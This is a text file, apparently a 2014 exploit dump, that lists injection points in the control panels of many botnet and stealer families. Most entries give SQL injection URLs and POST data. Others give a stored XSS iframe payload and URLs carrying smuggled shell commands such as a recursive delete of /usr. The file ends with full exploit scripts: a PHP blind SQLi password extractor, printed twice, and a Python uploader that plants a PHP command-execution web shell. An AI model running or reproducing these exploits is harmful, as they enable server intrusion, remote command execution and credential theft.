+===========================+
# Fuck the botnets                                                 
# Most recent botnet/stealer vulnerabilities  
# Project by abdilo                                                 
#                                                                                  
# Contact: [email protected]                           
# Twitter: 4sterea                                                   
#                                                          
# For more shit visit: www.abdilo.com/ftb    
# Credits to abdilo and asterea                         
+===========================+


 Random panel
==========

Type: SQLi
Vuln: http://site.com/g.php?id=1


 Athena
==========

Type: SQLi
Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&country_code=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now

 Alin1
==========

Nothing, unless logged in.


 Betabot
==========

Nope.


 Blackhole 2.1
==========

Bunch of XSS's and file manipulation vulns, nothing interesting.



 Carberp
==========

You can check, we had no time to do so.


 Casinoloader
==========

Type: SQLi
Vuln: http://localhost/gateway.php

POSTDATA page=1&val=1


 Citadel
==========

Type: SQLi
Vuln: http://localhost/cp.php?bots=1


 CRIMEPACK 3.1.3
============

Secure shit, like no XSS's or anything.


 CYTHOSIA BOTNET
=============

Type: Stored XSS and iFrame redirect

Click add task Command: IFRAME SRC="whateverekorlemonpartyorwhatnot.com" /IFRAME 

Then Click Create Task Finally click Tasks. VOILA! 

(Credits to asterea for finding this botnet panel)


 DLOADER
=============

Type: SQLi
Vuln1: http://localhost/includes/get_kktocc.php?line=1                
Vuln2: http://localhost/includes/update_url.php?fid=1


HERPES
=============

SQL injection.

http://localhost/tasks.php POST: vote=1&submitted=1


JACKPOS
=============

blindsqli after you login, pretty useless so i wont bother.


JHTTP
=============

Some sqlinjection vulnerabilities past the assets folder.


PLASMA
=============

Some Cross site scripting vulns and nothing else so no use telling you about them.


SAKURA
=============

Type: SQLi

http://localhost/func.php?showtopic=2 http://localhost/index.php?showtopic=322 http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312 http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor http://localhost/sakuraadmin44.php?link=http%3A%2F%2Fmetasploit.com%2F&threads=10 http://localhost/showthread.php?t=123 http://localhost/showthread.php?t=23&cmd=32

Type: SQLi - POST

http://localhost/sakuraadmin44.php?threads=222&link=21213.com POST: exploits=992.ds http://localhost/sakuraadmin44.php?threads=11 POST: snick=123&file=321&exploits=123 http://localhost/sakuraadmin44.php?threads=21 POST: snick=1


SILENCE WINLOCKER V5.0
=================

SQL injection.

http://localhost/forma.php?pin=4322 http://localhost/index.php?x=1&act=delete&id=1 http://localhost/picture.php?pin=8787 http://localhost/tmp/get.php?pin=1334


SMOKE LOADER
=============

Type: SQLi

http://localhost/control.php?id=1 http://localhost/guest.php?id=1

POST


SMSBOT
=============

nothing interesting.


SOLARBOT
=============

SQL injection.

localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD


SPY POSCARDSTEALER
=============

nope its secure.


SPY-EYE
=============

Type: SQLi

http://localhost/frm_boa-grabber_sub.php?dt=11%2F11%2F1998


TINBA
=============

Type: SQLi

\tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: bot_uid=1&botcomment=mate


UMBRA
=============

Type: SQLi

Vuln: http://localhost/delete_command.php?deleteID=1


VERTEXNET
=============

There are sqlinjection vulnerabilities but the likely hood of you actually finding a way of exploiting them is low.


ZEUS AND ZEUS EVO
=============

Type: SQLi

Vuln: http://localhost/gate.php?ip=8.8.8.8


ZSKIMMER
=============

Type: SQLi

Vuln: http://localhost/process.php?xy=2


iBanking
=============

Type: Shell upload

shell: <?php
	// Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
	// Start with PHP CLI (php pwn.php)
	set_time_limit(0);
	
	// Adjust this :)
	define('SLEEP_TIME', '4');
	define('PAGE_TIME',  4);
	define('URL',        'http://localhost/Phase/');
	
	echo('attacking ' . URL . PHP_EOL);
	
	get_string('username');
	get_string('password');
	
	function get_length($field) {
		$length = 1;
		
		while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
			++$length;
		}
		
		echo($field . ' length: ' . $length . PHP_EOL);
		
		return $length;
	}
	
	function get_string($field) {
		$length = get_length($field);
		$str    = '';
		
		for ($i = 0; $i < $length; ++$i) {
			$str .= chr(get_char($field, $i));
			echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
		}
		
		return $str;
	}
	
	function get_char($field, $id) {
		$binary = '';
		
		for ($i = 1; $i < 256; $i *= 2) {
			if ($i == 128)
				$binary = '0' . $binary;
			else
				$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
		}
		
		return bindec($binary);
	}
	
	function is_true($query) {
		$rc4_key   = 'aaaa'; // b d u
		$data      = 'u=tapz&d=faggot&b=lol';
		$encode    = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
		$encode    = $rc4_key . $encode;
		$injection = urlencode($query);
		$req       = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
		
		return !($req['time'] < PAGE_TIME);
	}
	
	function post_request($url, $data) {
        $handle = curl_init($url);
        
        curl_setopt($handle, CURLOPT_HEADER,         false);
        curl_setopt($handle, CURLOPT_USERAGENT,      'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
        curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($handle, CURLOPT_POST,           true);
        curl_setopt($handle, CURLOPT_POSTFIELDS,     $data);
		curl_setopt($handle, CURLOPT_TIMEOUT,        30);
        
		$time = microtime(true);
        $page = curl_exec($handle);
        $time = microtime(true) - $time;
		
        curl_close($handle);
		
        return array(
			'page' => $page,
			'time' => $time
		);
    }
	
	function rc4($pwd, $data, $data_length, $pwd_length){
		$key[] = '';
		$box[] = '';
		$cipher = '';

		for ($i = 0; $i < 256; $i++)
		{
			$key[$i] = ord($pwd[$i % $pwd_length]);
			$box[$i] = $i;
		}
		for ($j = $i = 0; $i < 256; $i++)
		{
			$j = ($j + $box[$i] + $key[$i]) % 256;
			$tmp = $box[$i];
			$box[$i] = $box[$j];
			$box[$j] = $tmp;
		}
		for ($a = $j = $i = 0; $i < $data_length; $i++)
		{
			$a = ($a + 1) % 256;
			$j = ($j + $box[$a]) % 256;
			$tmp = $box[$a];
			$box[$a] = $box[$j];
			$box[$j] = $tmp;
			$k = $box[(($box[$a] + $box[$j]) % 256)];
			$cipher .= chr(ord($data[$i]) ^ $k);
		}
		return $cipher;
	}

creds to: Xytilol

Atrax botnet
==============

Type: Shell Upload

Shell: #!/usr/bin/python

import random
import string
import base64
import urllib
import urllib2
 
# <CONFIG>
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
url     = 'http://localhost/atrax/'
# </CONFIG>
 
BOT_MODE_INSERT             = 'b' # BOT MODE
BOT_MODE_RUNPLUGIN          = 'e'
GET_PARAM_MODE              = 'a' # GET PARAM
POST_PARAM_GUID             = 'h' # POST PARAM
POST_PARAM_IP               = 'i'
POST_PARAM_BUILDID          = 'j'
POST_PARAM_PC               = 'k'
POST_PARAM_OS               = 'l'
POST_PARAM_ADMIN            = 'm'
POST_PARAM_CPU              = 'n'
POST_PARAM_GPU              = 'o'
POST_PARAM_PLUGINNAME       = 'q'
 
def request(url, get, post):
        if not get == '':
                url += '?' + get
        encoded = {}
        if not post == '':
                for _ in post.split('&'):
                        data             = _.split('=')
                        encoded[data[0]] = data[1]
        encoded  = urllib.urlencode(encoded)
        request  = urllib2.Request(url, encoded)
        response = urllib2.urlopen(request)
        page     = response.read()
        return page
 
def queryValue(key, value, next=True):
        ret = key + '=' + value
        if next:
                ret += '&'
        return ret
 
def randomString(length = 8):
        return ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(length))
 
def createVictim(url, guid, ip):
        get   = queryValue(GET_PARAM_MODE,     BOT_MODE_INSERT, False)
        post  = queryValue(POST_PARAM_GUID,    guid)
        post += queryValue(POST_PARAM_IP,      ip)
        post += queryValue(POST_PARAM_BUILDID, randomString())
        post += queryValue(POST_PARAM_PC,      randomString())
        post += queryValue(POST_PARAM_OS,      randomString())
        post += queryValue(POST_PARAM_ADMIN,   'yes')
        post += queryValue(POST_PARAM_CPU,     randomString())
        post += queryValue(POST_PARAM_GPU,     randomString(), False)
        return request(url + 'auth.php', get, post)
 
def exploit(url, guid, ip, file, payload):
        get   = queryValue(GET_PARAM_MODE,        BOT_MODE_RUNPLUGIN, False)
        post  = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer')
        post += queryValue(POST_PARAM_GUID,       guid)
        post += queryValue(POST_PARAM_IP,         ip)
        post += queryValue('am',                  randomString())
        post += queryValue('ad',                  file)
        post += queryValue('ab',                  base64.b64encode(payload))
        post += queryValue('ai',                  '18', False)
        request(url + 'auth.php', get, post)
 
def testExploit(url, guid, ip):
        file    = randomString() + '.php'
        payload = '<?php echo("1337"); ?>'
        exploit(url, guid, ip, file, payload)
        return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337'
         
guid    = '7461707a7461707a7461707a7461707a'
ip      = '91.224.13.103'
file    = randomString() + '.php'
if createVictim(url, guid, ip).strip() == 'STOP':
        print '[-] Cannot create victim...'
else:
        print '[~] Victim created/updated...'
        if testExploit(url, guid, ip):
                exploit(url, guid, ip, file, payload)
                print '[+] Exploit uploaded!'
                print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
        else:
                print '[-] Cannot upload payload, maybe the plugin is not actived?'
 

Phase botnet
===============

Type: blind SQLi

Vuln: <?php
	// Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
	// Start with PHP CLI (php pwn.php)
	set_time_limit(0);
	
	// Adjust this :)
	define('SLEEP_TIME', '4');
	define('PAGE_TIME',  4);
	define('URL',        'http://localhost/Phase/');
	
	echo('attacking ' . URL . PHP_EOL);
	
	get_string('username');
	get_string('password');
	
	function get_length($field) {
		$length = 1;
		
		while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
			++$length;
		}
		
		echo($field . ' length: ' . $length . PHP_EOL);
		
		return $length;
	}
	
	function get_string($field) {
		$length = get_length($field);
		$str    = '';
		
		for ($i = 0; $i < $length; ++$i) {
			$str .= chr(get_char($field, $i));
			echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
		}
		
		return $str;
	}
	
	function get_char($field, $id) {
		$binary = '';
		
		for ($i = 1; $i < 256; $i *= 2) {
			if ($i == 128)
				$binary = '0' . $binary;
			else
				$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
		}
		
		return bindec($binary);
	}
	
	function is_true($query) {
		$rc4_key   = 'aaaa'; // b d u
		$data      = 'u=tapz&d=faggot&b=lol';
		$encode    = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
		$encode    = $rc4_key . $encode;
		$injection = urlencode($query);
		$req       = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
		
		return !($req['time'] < PAGE_TIME);
	}
	
	function post_request($url, $data) {
        $handle = curl_init($url);
        
        curl_setopt($handle, CURLOPT_HEADER,         false);
        curl_setopt($handle, CURLOPT_USERAGENT,      'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
        curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($handle, CURLOPT_POST,           true);
        curl_setopt($handle, CURLOPT_POSTFIELDS,     $data);
		curl_setopt($handle, CURLOPT_TIMEOUT,        30);
        
		$time = microtime(true);
        $page = curl_exec($handle);
        $time = microtime(true) - $time;
		
        curl_close($handle);
		
        return array(
			'page' => $page,
			'time' => $time
		);
    }
	
	function rc4($pwd, $data, $data_length, $pwd_length){
		$key[] = '';
		$box[] = '';
		$cipher = '';

		for ($i = 0; $i < 256; $i++)
		{
			$key[$i] = ord($pwd[$i % $pwd_length]);
			$box[$i] = $i;
		}
		for ($j = $i = 0; $i < 256; $i++)
		{
			$j = ($j + $box[$i] + $key[$i]) % 256;
			$tmp = $box[$i];
			$box[$i] = $box[$j];
			$box[$j] = $tmp;
		}
		for ($a = $j = $i = 0; $i < $data_length; $i++)
		{
			$a = ($a + 1) % 256;
			$j = ($j + $box[$a]) % 256;
			$tmp = $box[$a];
			$box[$a] = $box[$j];
			$box[$j] = $tmp;
			$k = $box[(($box[$a] + $box[$j]) % 256)];
			$cipher .= chr(ord($data[$i]) ^ $k);
		}
		return $cipher;
	}




# siph0n [2014-08-14]